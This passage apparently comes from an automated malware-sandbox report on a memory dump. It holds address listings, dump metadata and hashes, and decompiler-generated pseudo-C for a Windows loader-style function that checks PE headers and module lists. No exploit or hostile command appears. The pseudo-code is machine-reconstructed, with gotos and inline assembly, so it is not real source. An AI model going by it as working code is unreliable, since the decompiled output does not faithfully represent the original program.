                                                      0x01682284
                                                      0x01682284
                                                      0x01682284
                                                      0x016821a6
                                                      0x016821a9
                                                      0x016821ac
                                                      0x016821ae
                                                      0x016821b3
                                                      0x0168228b
                                                      0x01682290
                                                      0x01682379
                                                      0x01682296
                                                      0x01682298
                                                      0x01682298
                                                      0x01682290
                                                      0x016821b9
                                                      0x016821be
                                                      0x016822a2
                                                      0x016822a2
                                                      0x016821c4
                                                      0x016821c8
                                                      0x016821cc
                                                      0x016821d0
                                                      0x016821d4
                                                      0x016821de
                                                      0x016821e3
                                                      0x016c5a29
                                                      0x016c5a2c
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5a3b
                                                      0x00000000
                                                      0x016821e9
                                                      0x016821e9
                                                      0x016821e9
                                                      0x016821ee
                                                      0x016821f1
                                                      0x016c5a45
                                                      0x016c5a4b
                                                      0x016c5a52
                                                      0x016c5a58
                                                      0x016c5a5d
                                                      0x016c5a5f
                                                      0x016c5a71
                                                      0x016c5a61
                                                      0x016c5a6a
                                                      0x016c5a6a
                                                      0x016c5a76
                                                      0x016c5a79
                                                      0x016c5a7f
                                                      0x016c5a83
                                                      0x016c5a85
                                                      0x016c5a87
                                                      0x016c5a87
                                                      0x016c5a8c
                                                      0x016c5a91
                                                      0x016c5a97
                                                      0x016c5a9f
                                                      0x016c5aa0
                                                      0x016c5aa1
                                                      0x016c5aa6
                                                      0x016c5aab
                                                      0x016c5ab1
                                                      0x016c5ab3
                                                      0x016c5ab9
                                                      0x016c5aca
                                                      0x016c5ad4
                                                      0x016c5ad4
                                                      0x016c5ade
                                                      0x016c5ade
                                                      0x016c5aab
                                                      0x016c5a79
                                                      0x016c5a52
                                                      0x016821f7
                                                      0x016821f9
                                                      0x016821fe
                                                      0x016821fe
                                                      0x016821e3
                                                      0x01682195
                                                      0x0168236c
                                                      0x01682122
                                                      0x01682122
                                                      0x01682124
                                                      0x01682231
                                                      0x01682236
                                                      0x01682236
                                                      0x01682238
                                                      0x01682238
                                                      0x01682240
                                                      0x01682242
                                                      0x01682244
                                                      0x016c59fc
                                                      0x0168218c
                                                      0x0168218c
                                                      0x00000000
                                                      0x0168218c
                                                      0x0168224a
                                                      0x0168224f
                                                      0x01682256
                                                      0x01682304
                                                      0x01682309
                                                      0x0168230f
                                                      0x0168231e
                                                      0x0168231e
                                                      0x0168231e
                                                      0x01682320
                                                      0x01682325
                                                      0x0168232a
                                                      0x0168232c
                                                      0x0168233e
                                                      0x0168233e
                                                      0x00000000
                                                      0x0168232c
                                                      0x01682311
                                                      0x01682317
                                                      0x0168231a
                                                      0x0168231c
                                                      0x01682380
                                                      0x01682380
                                                      0x01682380
                                                      0x01682384
                                                      0x00000000
                                                      0x00000000
                                                      0x01682386
                                                      0x00000000
                                                      0x0168231c
                                                      0x0168225c
                                                      0x0168225c
                                                      0x00000000
                                                      0x0168225c
                                                      0x0168212a
                                                      0x01682134
                                                      0x01682138
                                                      0x0168213d
                                                      0x016c5858
                                                      0x016c5863
                                                      0x016c5863
                                                      0x016c5867
                                                      0x016c586a
                                                      0x00000000
                                                      0x00000000
                                                      0x016c586c
                                                      0x016c586c
                                                      0x016c5871
                                                      0x016c5875
                                                      0x016c5877
                                                      0x016c5997
                                                      0x016c599c
                                                      0x016c59a1
                                                      0x016c59a7
                                                      0x016c59a7
                                                      0x00000000
                                                      0x016c59a7
                                                      0x016c587d
                                                      0x00000000
                                                      0x016c588b
                                                      0x016c588b
                                                      0x016c5890
                                                      0x016c5892
                                                      0x016c5894
                                                      0x016c5899
                                                      0x016c589b
                                                      0x016c58a0
                                                      0x016c58a0
                                                      0x016c58aa
                                                      0x016c58b2
                                                      0x016c58b6
                                                      0x016c58be
                                                      0x016c58c6
                                                      0x016c58c9
                                                      0x016c590d
                                                      0x016c5917
                                                      0x016c591a
                                                      0x016c591c
                                                      0x016c5920
                                                      0x016c5928
                                                      0x016c592a
                                                      0x016c592c
                                                      0x016c592e
                                                      0x016c592e
                                                      0x016c58cb
                                                      0x016c58cd
                                                      0x016c58d8
                                                      0x016c58e0
                                                      0x016c58f4
                                                      0x016c58fe
                                                      0x016c58fe
                                                      0x016c593a
                                                      0x016c593e
                                                      0x016c5940
                                                      0x016c5942
                                                      0x00000000
                                                      0x016c5944
                                                      0x016c5944
                                                      0x016c5949
                                                      0x016c594e
                                                      0x016c594e
                                                      0x016c5953
                                                      0x016c595b
                                                      0x016c5976
                                                      0x016c5976
                                                      0x016c597a
                                                      0x016c597f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5981
                                                      0x016c5981
                                                      0x016c5981
                                                      0x016c5983
                                                      0x016c5988
                                                      0x016c598d
                                                      0x016c5991
                                                      0x016c5991
                                                      0x00000000
                                                      0x016c595d
                                                      0x016c595d
                                                      0x016c5963
                                                      0x016c5965
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5967
                                                      0x016c5967
                                                      0x016c596b
                                                      0x016c596d
                                                      0x00000000
                                                      0x00000000
                                                      0x016c596f
                                                      0x016c5971
                                                      0x016c5971
                                                      0x016c5974
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5974
                                                      0x00000000
                                                      0x016c5967
                                                      0x016c595b
                                                      0x016c5942
                                                      0x016c5863
                                                      0x01682143
                                                      0x01682143
                                                      0x01682149
                                                      0x0168214f
                                                      0x016822f1
                                                      0x016822f6
                                                      0x00000000
                                                      0x01682173
                                                      0x01682173
                                                      0x0168217d
                                                      0x01682181
                                                      0x01682186
                                                      0x016c59ae
                                                      0x016c59b2
                                                      0x016c59b5
                                                      0x016c59b7
                                                      0x016c59ba
                                                      0x016c59cd
                                                      0x016c59d1
                                                      0x016c59d5
                                                      0x016c59d9
                                                      0x016c59db
                                                      0x00000000
                                                      0x00000000
                                                      0x016c59dd
                                                      0x016c59dd
                                                      0x016c59e1
                                                      0x016c59e4
                                                      0x016c59e7
                                                      0x016c59ee
                                                      0x016c59ee
                                                      0x016c59f3
                                                      0x016c59f3
                                                      0x00000000
                                                      0x01682186
                                                      0x0168214f
                                                      0x01682106
                                                      0x01682266
                                                      0x016820d8
                                                      0x016820da
                                                      0x016820e0
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe2a6537cc400645d09c4080dd4a85262a92f70b200345af9201741fab1cae21
                                                      • Instruction ID: cee0e695e0b1dfa416753890fcb9fa487b703c9bcab459da39293fd7fabd6626
                                                      • Opcode Fuzzy Hash: fe2a6537cc400645d09c4080dd4a85262a92f70b200345af9201741fab1cae21
                                                      • Instruction Fuzzy Hash: 62F1F2356083419FDB26DB2CCC6076B7BE2EF85724F14865DE99A9B381D734E841CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0166D5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E0166D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x174d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01666600(0x17452d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1747b9c; // 0x0
							_t281 = L01674620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0169F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1747b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x1747b8c; // 0x1202ab0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01672280(_t200, 0x17484d8);
									_t277 =  *0x17485f4; // 0x1202fa0
									_t351 =  *0x17485f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1202f38
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0166FFB0(_t287, _t353, 0x17484d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E016ACC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01666600(0x17452d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01667926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x174b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E016DE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1748472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x174b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x174b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01672280(_t250, 0x17484d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01693898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0166FFB0(_t293, _t353, 0x17484d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E016937F5(_t353, 0);
																}
																E01690413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01689B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E016802D6(_t174);
																}
																L016777F0( *0x1747b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0168C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0166EC7F(_t353);
										L016819B8(_t287, 0, _t353, 0);
										_t200 = E0165F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x174b2f8 |  *0x174b2fc) == 0 || ( *0x174b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0169B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x174b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01706B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01706AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0166E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0166EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01699730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0166E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01668F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01693C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                      0x0166d5f2
                                                      0x0166d5f5
                                                      0x0166d5f5
                                                      0x0166d5fd
                                                      0x0166d600
                                                      0x0166d60a
                                                      0x0166d60d
                                                      0x0166d617
                                                      0x0166d61d
                                                      0x0166d627
                                                      0x0166d62e
                                                      0x0166d911
                                                      0x0166d913
                                                      0x00000000
                                                      0x0166d919
                                                      0x0166d919
                                                      0x0166d919
                                                      0x0166d634
                                                      0x0166d634
                                                      0x0166d634
                                                      0x0166d634
                                                      0x0166d640
                                                      0x0166d8bf
                                                      0x00000000
                                                      0x0166d646
                                                      0x0166d646
                                                      0x0166d64d
                                                      0x0166d652
                                                      0x016bb2fc
                                                      0x016bb2fc
                                                      0x016bb302
                                                      0x016bb33b
                                                      0x016bb341
                                                      0x00000000
                                                      0x016bb304
                                                      0x016bb304
                                                      0x016bb319
                                                      0x016bb31e
                                                      0x016bb324
                                                      0x016bb326
                                                      0x016bb332
                                                      0x016bb347
                                                      0x016bb34c
                                                      0x016bb351
                                                      0x016bb35a
                                                      0x00000000
                                                      0x016bb328
                                                      0x016bb328
                                                      0x00000000
                                                      0x016bb328
                                                      0x016bb326
                                                      0x0166d658
                                                      0x0166d658
                                                      0x0166d65b
                                                      0x0166d665
                                                      0x00000000
                                                      0x0166d66b
                                                      0x0166d66b
                                                      0x0166d66b
                                                      0x0166d66b
                                                      0x0166d66d
                                                      0x0166d672
                                                      0x0166d67a
                                                      0x00000000
                                                      0x00000000
                                                      0x0166d680
                                                      0x0166d686
                                                      0x0166d8ce
                                                      0x0166d8d4
                                                      0x0166d8dd
                                                      0x0166d8e0
                                                      0x0166d68c
                                                      0x0166d691
                                                      0x0166d69d
                                                      0x0166d6a2
                                                      0x0166d6a7
                                                      0x0166d6b0
                                                      0x0166d6b5
                                                      0x0166d6e0
                                                      0x0166d6b7
                                                      0x0166d6b7
                                                      0x0166d6b9
                                                      0x0166d6b9
                                                      0x0166d6bb
                                                      0x0166d6bd
                                                      0x0166d6ce
                                                      0x0166d6d0
                                                      0x0166d6d2
                                                      0x016bb363
                                                      0x016bb365
                                                      0x00000000
                                                      0x016bb36b
                                                      0x00000000
                                                      0x016bb36b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0166d6bf
                                                      0x0166d6bf
                                                      0x0166d6e5
                                                      0x0166d6e7
                                                      0x0166d6e9
                                                      0x0166d6ec
                                                      0x0166d6ec
                                                      0x0166d6ef
                                                      0x0166d6f5
                                                      0x0166d6f9
                                                      0x0166d6fb
                                                      0x0166d6fd
                                                      0x0166d701
                                                      0x0166d703
                                                      0x0166d70a
                                                      0x0166d70a
                                                      0x0166d701
                                                      0x0166d710
                                                      0x0166d710
                                                      0x0166d6c1
                                                      0x0166d6c1
                                                      0x0166d6c6
                                                      0x016bb36d
                                                      0x016bb36f
                                                      0x00000000
                                                      0x016bb375
                                                      0x016bb375
                                                      0x016bb375
                                                      0x00000000
                                                      0x016bb375
                                                      0x00000000
                                                      0x0166d6cc
                                                      0x0166d6d8
                                                      0x0166d6d8
                                                      0x0166d6d8
                                                      0x00000000
                                                      0x0166d6c6
                                                      0x0166d6bf
                                                      0x00000000
                                                      0x0166d6da
                                                      0x0166d6da
                                                      0x0166d716
                                                      0x0166d71b
                                                      0x0166d720
                                                      0x0166d726
                                                      0x0166d726
                                                      0x0166d72d
                                                      0x00000000
                                                      0x0166d733
                                                      0x0166d739
                                                      0x0166d742
                                                      0x0166d750
                                                      0x0166d758
                                                      0x0166d764
                                                      0x0166d776
                                                      0x0166d77a
                                                      0x0166d783
                                                      0x0166d928
                                                      0x0166d92c
                                                      0x0166d93d
                                                      0x0166d944
                                                      0x0166d94f
                                                      0x0166d954
                                                      0x0166d956
                                                      0x0166d95f
                                                      0x0166d961
                                                      0x0166d973
                                                      0x0166d973
                                                      0x0166d956
                                                      0x0166d944
                                                      0x0166d92c
                                                      0x0166d78b
                                                      0x016bb394
                                                      0x0166d791
                                                      0x0166d798
                                                      0x016bb3a3
                                                      0x016bb3bb
                                                      0x016bb3bb
                                                      0x0166d7a5
                                                      0x0166d866
                                                      0x0166d870
                                                      0x0166d892
                                                      0x0166d898
                                                      0x0166d89e
                                                      0x0166d8a0
                                                      0x0166d8a6
                                                      0x0166d8ac
                                                      0x0166d8ae
                                                      0x0166d8b4
                                                      0x0166d8b4
                                                      0x0166d8ae
                                                      0x0166d7a5
                                                      0x0166d78b
                                                      0x0166d7b1
                                                      0x016bb3c5
                                                      0x016bb3c5
                                                      0x0166d7c3
                                                      0x0166d7ca
                                                      0x0166d7e5
                                                      0x0166d7eb
                                                      0x0166d8eb
                                                      0x0166d8ed
                                                      0x00000000
                                                      0x0166d8f3
                                                      0x0166d8f3
                                                      0x0166d8f3
                                                      0x00000000
                                                      0x0166d8ed
                                                      0x0166d7cc
                                                      0x0166d7cc
                                                      0x0166d7d2
                                                      0x00000000
                                                      0x0166d7d4
                                                      0x0166d7d4
                                                      0x0166d7d7
                                                      0x0166d7df
                                                      0x016bb3d4
                                                      0x016bb3d9
                                                      0x016bb3dc
                                                      0x016bb3dc
                                                      0x016bb3df
                                                      0x016bb3e2
                                                      0x016bb468
                                                      0x016bb46d
                                                      0x016bb46f
                                                      0x016bb46f
                                                      0x016bb475
                                                      0x0166d8f8
                                                      0x0166d8f9
                                                      0x0166d8fd
                                                      0x016bb3e8
                                                      0x016bb3e8
                                                      0x016bb3eb
                                                      0x016bb3ed
                                                      0x00000000
                                                      0x016bb3ef
                                                      0x016bb3ef
                                                      0x016bb3f1
                                                      0x016bb3f4
                                                      0x016bb3fe
                                                      0x016bb404
                                                      0x016bb409
                                                      0x016bb40e
                                                      0x016bb410
                                                      0x016bb410
                                                      0x016bb414
                                                      0x016bb414
                                                      0x016bb41b
                                                      0x016bb420
                                                      0x016bb423
                                                      0x016bb425
                                                      0x016bb427
                                                      0x016bb42a
                                                      0x016bb42d
                                                      0x016bb42d
                                                      0x016bb42a
                                                      0x016bb432
                                                      0x016bb436
                                                      0x016bb438
                                                      0x016bb43b
                                                      0x016bb43b
                                                      0x016bb449
                                                      0x016bb44e
                                                      0x016bb454
                                                      0x016bb458
                                                      0x016bb458
                                                      0x016bb45d
                                                      0x00000000
                                                      0x016bb45d
                                                      0x016bb3ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0166d7df
